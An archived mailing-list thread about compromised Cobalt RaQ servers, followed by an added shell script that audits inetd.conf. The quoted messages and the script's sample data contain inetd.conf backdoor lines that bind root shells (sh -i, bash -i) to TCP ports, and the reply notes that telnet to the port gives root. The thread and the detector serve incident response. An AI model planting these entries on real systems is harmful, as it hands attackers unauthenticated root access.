
Re: [cobalt-users] Recent Hacks



<GIEPIHKKCNKNGFCJNFCICEDMEMAA.isplists@xxxxxxxxxxxx> wrote:

> +I was on a hacked box today in which the cracker's way back in was tossing the
> +following lines into inetd.conf:
> +8282 stream tcp nowait root /bin/sh sh -i
> +8888 stream tcp nowait root /bin/bash bash -i
> +
> +Simple and utterly effective.  Kind of funny too.
> +I would suggest checking the output of netstat -natp to see what is listening
> +on your tcp ports.

> I take it this would be the same scenario:
> 8000 stream tcp nowait root /bin/sh sh -i
> last entry to inetd.conf on a BIND PATCHED Raq4

Yup all you have to do is telnet IP 8000 and instant root shell.   Your box was
hacked.  

Jeff-
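
An added example, not part of the original thread: a shell check for the kind of inetd.conf entry quoted above. It flags any entry whose server program (or, behind a wrapper such as tcpd, its first argument) is a shell. The function names and the sample file are constructed for illustration, and the wrapper case goes slightly beyond the lines quoted in the messages.

```shell
#!/bin/sh
# Added example: flag inetd.conf entries that give a shell to anyone who connects.
# inetd.conf fields: service socktype proto wait user server-program args...

audit_inetd() {
    # Reads inetd.conf-format text from the files given, or from stdin if none.
    awk '
        function base(p,   a, n) { n = split(p, a, "/"); return a[n] }
        function is_shell(p) { return base(p) ~ /^(sh|bash|ash|dash|csh|tcsh|ksh|zsh)$/ }
        $1 ~ /^#/ || NF < 6 { next }     # comments, blank and malformed lines
        # $6 is the program inetd executes; $7 is argv[0], which names the real
        # target when $6 is a wrapper such as tcpd.
        is_shell($6) || (NF >= 7 && is_shell($7)) {
            prog = is_shell($6) ? $6 : $7
            split($5, u, "[.:]")         # user may be written as user.group
            printf "line %d: service %s/%s runs %s as %s\n", FNR, $1, $3, prog, u[1]
        }
    ' "$@"
}

sample_inetd_conf() {
    # Constructed sample: two ordinary services plus the entries quoted in the
    # thread, one of them commented out to show that it is skipped.
    cat <<'EOF'
# constructed sample, not taken from a real host
ftp     stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp  nowait  root  /usr/sbin/tcpd  in.telnetd
8282 stream tcp nowait root /bin/sh sh -i
8888 stream tcp nowait root /bin/bash bash -i
#8000 stream tcp nowait root /bin/sh sh -i
8000 stream tcp nowait root /bin/sh sh -i
EOF
}

# Stand-alone run over the constructed sample.
sample_inetd_conf | audit_inetd
```

On a live host, call `audit_inetd /etc/inetd.conf` and compare any hit against the listening sockets shown by `netstat -natp`.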